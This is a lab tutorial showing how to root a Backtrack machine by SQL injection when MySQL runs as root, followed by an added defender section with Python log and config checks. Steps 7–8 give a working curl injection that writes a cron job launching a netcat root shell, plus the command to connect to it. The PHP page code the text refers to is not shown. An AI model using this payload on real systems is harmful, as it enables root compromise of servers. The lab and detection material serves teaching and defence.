A Brute Pwn - Rooting a Box via SQLi when MySQL Runs as Root

Steps (using Backtrack 5 r3):

1) Start the Apache service:

   root@bt:~# service apache2 start

2) Start the MySQL service as root:

   root@bt:~# sed -i 's/= mysql/= root/1' /etc/mysql/my.cnf && start mysql

3) Create the database:

   root@bt:~# mysql -u root -ptoor
   mysql> create database News;
   mysql> use News;
   mysql> create table Content (id INT not null auto_increment primary key, data VARCHAR (100));
   mysql> insert into Content (data) values ('a lot of words 1');
   /* repeat the insert above, replacing 1 with 2, 3, 4 and 5 */
   mysql> select * from Content;

4) Create the vulnerable PHP page in the server root:

   root@bt:~# nano /var/www/page.php
   ---[copy & paste the code below]---
   ---[Save with "Ctrl+X" then "y" & ENTER]---

5) Open the Firefox browser and navigate to http://localhost/page.php?id=1 to check that the page works properly.

6) Use another machine or VM as the attacker. If you don't have one, follow these steps:

   - Install KVM:
     root@bt:~# apt-get install kvm
   - Download Tiny Core Linux:
     root@bt:~# wget http://tinycorelinux.net/4.x/x86/release/Core-current.iso
   - Run the VM:
     root@bt:~# kvm --cdrom Core-current.iso &
   - Wait for Tiny Core to boot, then install curl:
     tc@box:~$ tce-load -wi curl

7) Request the following URL with a SQL injection, replacing [TARGET] with your Backtrack internal IP (all on one line):

   tc@box:~$ curl "[TARGET]/page.php?id=0+union+select'*%20*%20*%20*%20*%20root%20/bin/nc%20-lp53%20-e%20/bin/sh'into+outfile'/etc/cron.d/s'"

8) Wait a few seconds (at most 1 minute) until the target opens port 53, then run:

   tc@box:~$ nc [TARGET] 53

Don't learn to HACK, hack to LEARN.
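Two defender-side checks for this setup, added here as an example and not code from the original post: one reads a my.cnf fragment and reports which user the [mysqld] section runs as (the setting the sed command changes), the other decodes Apache access-log requests and flags UNION SELECT ... INTO OUTFILE/DUMPFILE injections like the curl request above. The my.cnf fragment and log lines are constructed; the function names and regexes are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed my.cnf fragment showing the effect of the sed command above.
MY_CNF_AFTER_SED = """[mysqld_safe]
socket = /var/run/mysqld/mysqld.sock
[mysqld]
user = root
!includedir /etc/mysql/conf.d/
"""

# Constructed Apache combined-format lines: a normal request, then the injected one.
ACCESS_LOG = [
    '10.0.2.15 - - [12/Oct/2012:14:03:01 +0000] "GET /page.php?id=1 HTTP/1.1" 200 128 "-" "Mozilla/5.0"',
    '10.0.2.2 - - [12/Oct/2012:14:03:11 +0000] "GET /page.php?id=0+union+select\'*%20*%20*%20*%20*%20root%20/bin/nc%20-lp53%20-e%20/bin/sh\'into+outfile\'/etc/cron.d/s\' HTTP/1.1" 200 512 "-" "curl/7.26.0"',
]

def mysqld_user(my_cnf_text):
    """Return the 'user' value of the [mysqld] section, or None if it is not set."""
    section, user = None, None
    for line in my_cnf_text.splitlines():
        line = line.strip()
        if sec := re.match(r"\[(\w+)\]", line):
            section = sec.group(1)
        elif section == "mysqld" and (opt := re.match(r"user\s*=\s*(\S+)", line)):
            user = opt.group(1)
    return user

# Client IP and request path of a combined-format line; the decoded path is then
# checked for UNION SELECT ... INTO OUTFILE/DUMPFILE, i.e. a file write via SQLi.
REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP')
OUTFILE_RE = re.compile(r"union\s+select.*into\s+(?:outfile|dumpfile)", re.I | re.S)

def find_outfile_injections(lines):
    """Return (client_ip, decoded_request) for every line matching OUTFILE_RE."""
    hits = []
    for line in lines:
        req = REQ_RE.match(line)
        if not req:
            continue
        ip, path = req.groups()
        decoded = unquote_plus(path)  # '+' and '%20' both become spaces
        if OUTFILE_RE.search(decoded):
            hits.append((ip, decoded))
    return hits

if __name__ == "__main__":
    print("mysqld runs as:", mysqld_user(MY_CNF_AFTER_SED))
    for ip, req in find_outfile_injections(ACCESS_LOG):
        print("INTO OUTFILE injection from", ip, "->", req)
```

Beyond running mysqld as an unprivileged user, MySQL's secure_file_priv variable limits where INTO OUTFILE may write, and page.php should bind id as a query parameter so the injection never reaches the database.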